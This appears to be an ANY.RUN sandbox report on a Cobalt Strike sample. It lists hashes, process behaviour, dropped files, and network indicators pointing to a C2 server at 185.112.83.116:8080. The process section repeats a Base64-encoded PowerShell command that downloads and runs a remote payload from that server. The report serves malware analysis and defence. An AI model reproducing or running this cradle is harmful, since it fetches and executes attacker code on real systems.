analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

ttest.text

Full analysis: https://app.any.run/tasks/52fe5ab9-da76-4142-8c08-91bda0ee5c69
Verdict: Malicious activity
Threats:

Cobalt Strike is a legitimate penetration software toolkit developed by Forta. But its cracked versions are widely adopted by bad actors, who use it as a C2 system of choice for targeted attacks.

Analysis date: January 14, 2022, 20:35:29
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
cobaltstrike
trojan
Indicators:
MIME: text/plain
File info: ASCII text, with no line terminators
MD5:

52CB5D2BF929392C11E48F7B7BE883FB

SHA1:

E250BBB9F670F05D3B1D52962C7DF8E50EA06829

SHA256:

16EA40F04D29F260D97E4B9D3F5AE0DCEFCE749119F34C1F212173907A9592D9

SSDEEP:

6:snyUeCrgSqSCUdT14Ee2vCoj70/8QpQJQkhkrRksS/nmaa:snhrgSqJb25jckXYw/Fa

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • COBALTSTRIKE was detected

      • powershell.exe (PID: 2640)
      • powershell.exe (PID: 188)
      • powershell.exe (PID: 2560)
  • SUSPICIOUS

    • Reads the date of Windows installation

      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 3112)
      • powershell.exe (PID: 2876)
      • powershell.exe (PID: 1108)
      • powershell.exe (PID: 3396)
    • Checks supported languages

      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 2640)
      • powershell.exe (PID: 3112)
      • powershell.exe (PID: 188)
      • powershell.exe (PID: 2876)
      • powershell.exe (PID: 2560)
      • powershell.exe (PID: 1108)
      • powershell.exe (PID: 3396)
    • PowerShell script executed

      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 3112)
      • powershell.exe (PID: 2876)
      • powershell.exe (PID: 1108)
      • powershell.exe (PID: 3396)
    • Application launched itself

      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 3112)
      • powershell.exe (PID: 2876)
      • taskmgr.exe (PID: 1292)
    • Creates files in the user directory

      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 3112)
      • powershell.exe (PID: 2876)
      • powershell.exe (PID: 1108)
      • powershell.exe (PID: 3396)
    • Reads the computer name

      • powershell.exe (PID: 2640)
      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 3112)
      • powershell.exe (PID: 188)
      • powershell.exe (PID: 2876)
      • powershell.exe (PID: 2560)
      • powershell.exe (PID: 1108)
      • powershell.exe (PID: 3396)
    • Executes PowerShell scripts

      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 3112)
      • powershell.exe (PID: 2876)
    • Reads Environment values

      • powershell.exe (PID: 2640)
      • powershell.exe (PID: 188)
      • powershell.exe (PID: 2560)
  • INFO

    • Checks supported languages

      • rundll32.exe (PID: 3088)
      • taskmgr.exe (PID: 1292)
      • taskmgr.exe (PID: 3360)
      • WINWORD.EXE (PID: 1764)
      • WINWORD.EXE (PID: 1364)
      • WINWORD.EXE (PID: 2464)
      • WINWORD.EXE (PID: 1856)
      • WINWORD.EXE (PID: 2784)
      • WINWORD.EXE (PID: 1340)
    • Manual execution by user

      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 3112)
      • powershell.exe (PID: 2876)
      • taskmgr.exe (PID: 1292)
      • powershell.exe (PID: 1108)
      • WINWORD.EXE (PID: 1764)
      • WINWORD.EXE (PID: 1364)
      • WINWORD.EXE (PID: 2464)
      • WINWORD.EXE (PID: 1856)
      • WINWORD.EXE (PID: 2784)
      • WINWORD.EXE (PID: 1340)
      • powershell.exe (PID: 3396)
    • Checks Windows Trust Settings

      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 2640)
      • powershell.exe (PID: 3112)
      • powershell.exe (PID: 188)
      • powershell.exe (PID: 2560)
      • powershell.exe (PID: 2876)
      • powershell.exe (PID: 1108)
      • powershell.exe (PID: 3396)
    • Reads the computer name

      • taskmgr.exe (PID: 1292)
      • taskmgr.exe (PID: 3360)
      • WINWORD.EXE (PID: 1764)
      • WINWORD.EXE (PID: 1364)
      • WINWORD.EXE (PID: 1856)
      • WINWORD.EXE (PID: 2464)
      • WINWORD.EXE (PID: 2784)
      • WINWORD.EXE (PID: 1340)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 1364)
      • WINWORD.EXE (PID: 1764)
      • WINWORD.EXE (PID: 2464)
      • WINWORD.EXE (PID: 1856)
      • WINWORD.EXE (PID: 2784)
      • WINWORD.EXE (PID: 1340)
    • Reads Microsoft Office registry keys

      • powershell.exe (PID: 1108)
      • WINWORD.EXE (PID: 1364)
      • WINWORD.EXE (PID: 2464)
      • WINWORD.EXE (PID: 1764)
      • powershell.exe (PID: 3396)
      • WINWORD.EXE (PID: 2784)
      • WINWORD.EXE (PID: 1340)
      • WINWORD.EXE (PID: 1856)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
74
Monitored processes
17
Malicious processes
8
Suspicious processes
0

Behavior graph

Click at the process to see the details
start rundll32.exe no specs powershell.exe no specs #COBALTSTRIKE powershell.exe powershell.exe no specs #COBALTSTRIKE powershell.exe powershell.exe no specs #COBALTSTRIKE powershell.exe taskmgr.exe no specs taskmgr.exe powershell.exe no specs winword.exe no specs winword.exe no specs winword.exe no specs winword.exe no specs winword.exe no specs winword.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3088"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL "C:\Users\admin\Desktop\ttest.text"C:\Windows\system32\rundll32.exeExplorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2252"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-file" "C:\Users\admin\Desktop\ttest.ps1"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeExplorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
2640"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOAA1AC4AMQAxADIALgA4ADMALgAxADEANgA6ADgAMAA4ADAALwBkAHIAdgAnACkAKQA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
3112"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-file" "C:\Users\admin\Desktop\ttest.ps1"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeExplorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
188"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOAA1AC4AMQAxADIALgA4ADMALgAxADEANgA6ADgAMAA4ADAALwBkAHIAdgAnACkAKQA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
2876"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-file" "C:\Users\admin\Desktop\ttest.ps1"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeExplorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
2560"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOAA1AC4AMQAxADIALgA4ADMALgAxADEANgA6ADgAMAA4ADAALwBkAHIAdgAnACkAKQA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
1292"C:\Windows\system32\taskmgr.exe" /4C:\Windows\system32\taskmgr.exeExplorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Task Manager
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3360"C:\Windows\system32\taskmgr.exe" /1C:\Windows\system32\taskmgr.exe
taskmgr.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Task Manager
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1108"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-file" "C:\Users\admin\AppData\Local\Temp\b87bb509-d7e5-4eef-9c5e-545e6cb556f4.ps1"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeExplorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Total events
27 573
Read events
24 868
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
81
Text files
59
Unknown types
60

Dropped files

PID
Process
Filename
Type
2252powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UWQXBR131BVQCOF4MIX8.tempbinary
MD5:3C4F6C229966CFB1669BE9E688C7837A
SHA256:35A2EB8E2E0AE41B3B7A5614F30F6E46FBBB11935546D66C3775B8BF85A5A82D
3112powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ITO4TTKJEPUU4MJ82CTL.tempbinary
MD5:3C4F6C229966CFB1669BE9E688C7837A
SHA256:35A2EB8E2E0AE41B3B7A5614F30F6E46FBBB11935546D66C3775B8BF85A5A82D
2252powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1156e7.TMPbinary
MD5:CCFCF369F751CE8DA0370D84E52A7EED
SHA256:53922490C3F5A04667EC3605A01AF2A4F4F265782D1BCA519F63ACAD413F2ED9
2252powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:3C4F6C229966CFB1669BE9E688C7837A
SHA256:35A2EB8E2E0AE41B3B7A5614F30F6E46FBBB11935546D66C3775B8BF85A5A82D
3112powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1166b6.TMPbinary
MD5:3C4F6C229966CFB1669BE9E688C7837A
SHA256:35A2EB8E2E0AE41B3B7A5614F30F6E46FBBB11935546D66C3775B8BF85A5A82D
2876powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF11701c.TMPbinary
MD5:3C4F6C229966CFB1669BE9E688C7837A
SHA256:35A2EB8E2E0AE41B3B7A5614F30F6E46FBBB11935546D66C3775B8BF85A5A82D
3112powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:3C4F6C229966CFB1669BE9E688C7837A
SHA256:35A2EB8E2E0AE41B3B7A5614F30F6E46FBBB11935546D66C3775B8BF85A5A82D
2876powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PHSG80632C9STIMFYKE1.tempbinary
MD5:3C4F6C229966CFB1669BE9E688C7837A
SHA256:35A2EB8E2E0AE41B3B7A5614F30F6E46FBBB11935546D66C3775B8BF85A5A82D
2876powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:3C4F6C229966CFB1669BE9E688C7837A
SHA256:35A2EB8E2E0AE41B3B7A5614F30F6E46FBBB11935546D66C3775B8BF85A5A82D
2640powershell.exeC:\Users\admin\AppData\Local\Temp\4ndimie2.mbd.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
3
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2640
powershell.exe
GET
200
185.112.83.116:8080
http://185.112.83.116:8080/drv
RU
text
57.9 Kb
malicious
188
powershell.exe
GET
200
185.112.83.116:8080
http://185.112.83.116:8080/drv
RU
text
57.9 Kb
malicious
2560
powershell.exe
GET
200
185.112.83.116:8080
http://185.112.83.116:8080/drv
RU
text
57.9 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
188
powershell.exe
185.112.83.116:8080
Total Server Solutions L.L.C.
RU
malicious
2640
powershell.exe
185.112.83.116:8080
Total Server Solutions L.L.C.
RU
malicious
2560
powershell.exe
185.112.83.116:8080
Total Server Solutions L.L.C.
RU
malicious

DNS requests

No data

Threats

PID
Process
Class
Message
2640
powershell.exe
A Network Trojan was detected
AV MALWARE CobaltStrike Trojan Powershell Payload Inbound
188
powershell.exe
A Network Trojan was detected
AV MALWARE CobaltStrike Trojan Powershell Payload Inbound
2560
powershell.exe
A Network Trojan was detected
AV MALWARE CobaltStrike Trojan Powershell Payload Inbound
No debug info